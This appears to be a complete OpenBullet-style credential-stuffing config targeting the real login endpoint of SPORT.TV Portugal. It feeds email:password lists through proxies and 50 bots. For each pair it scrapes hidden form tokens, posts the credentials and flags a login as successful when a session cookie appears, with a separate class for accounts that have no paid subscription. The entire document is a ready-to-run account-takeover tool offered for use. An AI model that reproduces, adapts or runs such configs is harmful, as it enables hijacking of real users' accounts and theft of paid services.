[SETTINGS]
{
  "Name": "SPORT.TV PT",
  "SuggestedBots": 50,
  "LastModified": "2018-09-05T20:29:19.4943311+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_PAGE REQUEST GET "https://login.sporttv.pt/sso/Login.action?redirectURL=https://www.sporttv.pt/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_SOURCEPAGE PARSE "<SOURCE>" CSS "[name=_sourcePage]" "value" 0 -> VAR "SOURCEPAGE" "" "" 
#PARSE_FP PARSE "<SOURCE>" CSS "[name=__fp]" "value" 0 -> VAR "FP" "" "" 
#POST_LOGIN REQUEST POST "https://login.sporttv.pt/sso/Login.action" AutoRedirect=TRUE 
  CONTENT "user.email=<USER>&user.passwordHash=<PASS>&login=Login&_sourcePage=<SOURCEPAGE>&__fp=<FP>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://login.sporttv.pt" 
  HEADER "Referer: https://login.sporttv.pt/sso/Login.action?redirectURL=https://www.sporttv.pt/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Credenciais inválidas" 
    KEY "O campo \"Password\" é obrigatório" 
    KEY "O campo \"Email\" é obrigatório" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "ASP.NET_SessionId" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "ADIRA JÁ!" 
